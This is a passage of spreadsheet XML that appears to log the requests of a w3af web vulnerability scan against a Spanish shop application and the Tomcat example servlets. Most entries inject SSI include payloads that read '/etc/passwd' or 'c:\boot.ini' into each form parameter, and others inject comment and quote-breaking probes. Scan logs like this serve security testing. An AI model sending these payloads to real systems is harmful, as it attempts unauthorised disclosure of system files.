    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;!--#include+file="/etc/passwd"--&gt;&amp;login=56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&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;login=56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&lt;!--#include+file="c:\\boot.ini"--&gt;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&lt;!--#include+file="c:\\boot.ini"--&gt;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w3af@email.com&amp;modo=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;!--#include+file="/etc/passwd"--&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=&lt;!--#include+file="/etc/passwd"--&gt;&amp;provincia=0&amp;login=56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&lt;!--#include+file="c:\\boot.ini"--&gt;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w3af@email.com&amp;modo=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=&lt;!--#include+file="c:\\boot.ini"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;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&lt;!--#include+file="/etc/passwd"--&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=&lt;!--#include+file="c:\\boot.ini"--&gt;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&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=&lt;!--#include+file="/etc/passwd"--&gt;&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=&lt;!--#include+file="/etc/passwd"--&gt;&amp;provincia=24&amp;login=56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&lt;!--#include+file="/etc/passwd"--&gt;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56&amp;email=w3af@email.com&amp;modo=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;!--#include+file="/etc/passwd"--&gt;&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=&lt;!--#include+file="/etc/passwd"--&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/examples/jsp/security/protected/j_security_check?j_username=&amp;j_password=</t>
  </si>
  <si>
    <t>/examples/jsp/security/protected/j_security_check?j_username=john&amp;j_password=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/security/protected/j_security_check?j_username=john&amp;j_password=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/security/protected/j_security_check?j_username=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;j_password=frame30.</t>
  </si>
  <si>
    <t>/examples/jsp/security/protected/j_security_check?j_username=&lt;!--#include+file="/etc/passwd"--&gt;&amp;j_password=frame30.</t>
  </si>
  <si>
    <t>/examples/servlets/</t>
  </si>
  <si>
    <t>/examples/jsp/</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/sessionexample?dataname=&amp;datavalue=</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/sessionexample?dataname=&lt;!--#include+file="/etc/passwd"--&gt;&amp;datavalue=hello+world</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/sessionexample?dataname=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;datavalue=hello+world</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/sessionexample?dataname=hello+world&amp;datavalue=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/sessionexample?dataname=hello+world&amp;datavalue=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/requestparamexample?lastname=&amp;firstname=</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/requestparamexample?lastname=&lt;!--#include+file="/etc/passwd"--&gt;&amp;firstname=john</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/requestparamexample?lastname=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;firstname=john</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/requestparamexample?lastname=smith&amp;firstname=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/requestparamexample?lastname=smith&amp;firstname=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/cookieexample?cookiename=&amp;cookievalue=</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/cookieexample?cookiename=john&amp;cookievalue=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/cookieexample?cookiename=&lt;!--#include+file="/etc/passwd"--&gt;&amp;cookievalue=7</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/cookieexample?cookiename=john&amp;cookievalue=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/cookieexample?cookiename=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;cookievalue=7</t>
  </si>
  <si>
    <t>/examples/jsp/jsp2/el/functions.jsp?foo=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/jsp2/el/functions.jsp?foo=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/error/err.jsp?name=&lt;!--#include+file="/etc/passwd"--&gt;&amp;submit=submit</t>
  </si>
  <si>
    <t>/examples/jsp/error/err.jsp?name=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;submit=submit</t>
  </si>
  <si>
    <t>/examples/jsp/cal/cal1.jsp?action=submit&amp;name=&lt;!--#include+file="/etc/passwd"--&gt;&amp;email=w3af@email.com</t>
  </si>
  <si>
    <t>/examples/jsp/cal/cal1.jsp?action=submit&amp;name=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;email=w3af@email.com</t>
  </si>
  <si>
    <t>/examples/jsp/cal/cal1.jsp?action=submit&amp;name=john&amp;email=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/cal/cal1.jsp?action=submit&amp;name=john&amp;email=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/num/numguess.jsp?guess=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/num/numguess.jsp?guess=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/colors/colrs.jsp?color1=&lt;!--#include+file="/etc/passwd"--&gt;&amp;action=hint&amp;color2=blue</t>
  </si>
  <si>
    <t>/examples/jsp/colors/colrs.jsp?color1=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;action=hint&amp;color2=blue</t>
  </si>
  <si>
    <t>/examples/jsp/colors/colrs.jsp?color1=blue&amp;action=hint&amp;color2=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/colors/colrs.jsp?color1=blue&amp;action=hint&amp;color2=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/sessions/carts.jsp?item=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;submit=remove</t>
  </si>
  <si>
    <t>/examples/jsp/sessions/carts.jsp?item=&lt;!--#include+file="/etc/passwd"--&gt;&amp;submit=remove</t>
  </si>
  <si>
    <t>/examples/jsp/jsp2/el/implicit-objects.jsp?foo=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/jsp2/el/implicit-objects.jsp?foo=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/checkbox/checkresult.jsp?fruit=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;fruit=grapes&amp;fruit=oranges&amp;fruit=melons&amp;submit=submit</t>
  </si>
  <si>
    <t>/examples/jsp/checkbox/checkresult.jsp?fruit=&lt;!--#include+file="/etc/passwd"--&gt;&amp;fruit=grapes&amp;fruit=oranges&amp;fruit=melons&amp;submit=submit</t>
  </si>
  <si>
    <t>/examples/jsp/checkbox/checkresult.jsp?fruit=apples&amp;fruit=&lt;!--#include+file="/etc/passwd"--&gt;&amp;fruit=oranges&amp;fruit=melons&amp;submit=submit</t>
  </si>
  <si>
    <t>/examples/jsp/checkbox/checkresult.jsp?fruit=apples&amp;fruit=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;fruit=oranges&amp;fruit=melons&amp;submit=submit</t>
  </si>
  <si>
    <t>/examples/jsp/checkbox/checkresult.jsp?fruit=apples&amp;fruit=grapes&amp;fruit=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;fruit=melons&amp;submit=submit</t>
  </si>
  <si>
    <t>/examples/jsp/checkbox/checkresult.jsp?fruit=apples&amp;fruit=grapes&amp;fruit=&lt;!--#include+file="/etc/passwd"--&gt;&amp;fruit=melons&amp;submit=submit</t>
  </si>
  <si>
    <t>/examples/jsp/checkbox/checkresult.jsp?fruit=apples&amp;fruit=grapes&amp;fruit=oranges&amp;fruit=&lt;!--#include+file="/etc/passwd"--&gt;&amp;submit=submit</t>
  </si>
  <si>
    <t>/examples/jsp/checkbox/checkresult.jsp?fruit=apples&amp;fruit=grapes&amp;fruit=oranges&amp;fruit=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;submit=submit</t>
  </si>
  <si>
    <t>/examples/jsp/checkbox/checkresult.jsp?fruit=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;submit=submit</t>
  </si>
  <si>
    <t>/examples/jsp/checkbox/checkresult.jsp?fruit=&lt;!--#include+file="/etc/passwd"--&gt;&amp;submit=submit</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/sessionexample?dataname=&lt;!--#include+file="/etc/passwd"--&gt;&amp;datavalue=bar</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/sessionexample?dataname=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;datavalue=bar</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/sessionexample?dataname=foo&amp;datavalue=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/examples/servlets/servlet/sessionexample?dataname=foo&amp;datavalue=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/colors/colrs.jsp?color1=&amp;color2=</t>
  </si>
  <si>
    <t>/examples/jsp/colors/colrs.jsp?color1=&lt;!--#include+file="/etc/passwd"--&gt;&amp;color2=blue</t>
  </si>
  <si>
    <t>/examples/jsp/colors/colrs.jsp?color1=&lt;!--#include+file="c:\\boot.ini"--&gt;&amp;color2=blue</t>
  </si>
  <si>
    <t>/examples/jsp/colors/colrs.jsp?color1=blue&amp;color2=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/colors/colrs.jsp?color1=blue&amp;color2=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/jsp2/jspx/textrotate.jspx?name=&lt;!--#include+file="c:\\boot.ini"--&gt;</t>
  </si>
  <si>
    <t>/examples/jsp/jsp2/jspx/textrotate.jspx?name=&lt;!--#include+file="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/imagenes/logo.gif</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=0</t>
  </si>
  <si>
    <t>/antoanweb/imagenes/nuestratierra.jpg</t>
  </si>
  <si>
    <t>/antoanweb/publico/miembros.jsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&amp;modo=entrar&amp;pwd=&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=&amp;provincia=50&amp;dni=&amp;direccion=&amp;apellidos=&amp;ciudad=&amp;modo=registro&amp;nombre=&amp;ntc=&amp;password=&amp;email=&amp;login=</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=&amp;provincia=0&amp;login=&amp;dni=&amp;direccion=&amp;apellidos=&amp;ciudad=&amp;nombre=&amp;ntc=&amp;cp=&amp;email=&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=&amp;provincia=24&amp;login=&amp;dni=&amp;direccion=&amp;apellidos=&amp;ciudad=&amp;nombre=&amp;ntc=&amp;cp=&amp;email=&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;!--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=&lt;!--&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;!--&amp;modo=entrar&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=&lt;!--&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=&lt;!--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=d'z"0&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=&lt;!--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=&lt;!--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z"0&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=&lt;!--&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;!--&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=&lt;!--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&lt;!--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=&lt;!--&amp;provincia=50&amp;dni=56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&lt;!--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=&lt;!--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=&lt;!--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=&lt;!--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=&lt;!--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=&lt;!--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;!--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=&lt;!--&amp;provincia=0&amp;login=56&amp;dni=56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&lt;!--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=&lt;!--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=&lt;!--&amp;direccion=bonsai+street+123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&lt;!--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=&lt;!--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;!--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;!--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=d'z"0&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=&lt;!--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&lt;!--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&lt;!--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=&lt;!--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=&lt;!--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=&lt;!--&amp;provincia=24&amp;login=56&amp;dni=56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&lt;!--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=&lt;!--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;!--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=&lt;!--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=d'z"0&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=&lt;!--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=&lt;!--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;!--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=&lt;!--&amp;id=3&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=3&amp;cantidad=&lt;!--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=vino+rioja&amp;precio=85&amp;id=&lt;!--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;!--&amp;precio=39&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=&lt;!--&amp;id=2&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=2&amp;cantidad=&lt;!--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=queso+manchego&amp;precio=39&amp;id=&lt;!--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=&lt;!--&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=100&amp;id=1&amp;cantidad=&lt;!--</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=jamã³n+ibã©rico&amp;precio=&lt;!--&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?nombre=&lt;!--&amp;precio=100&amp;id=1&amp;cantidad=1</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=&lt;!--&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=&lt;!--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&lt;!--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&lt;!--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&lt;!--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=&lt;!--&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires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&lt;!--&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=&lt;!--&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=insertar&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=&lt;!--</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=&lt;!--&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=&lt;!--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&lt;!--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&lt;!--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w3af@email.com&amp;modo=&lt;!--</t>
  </si>
  <si>
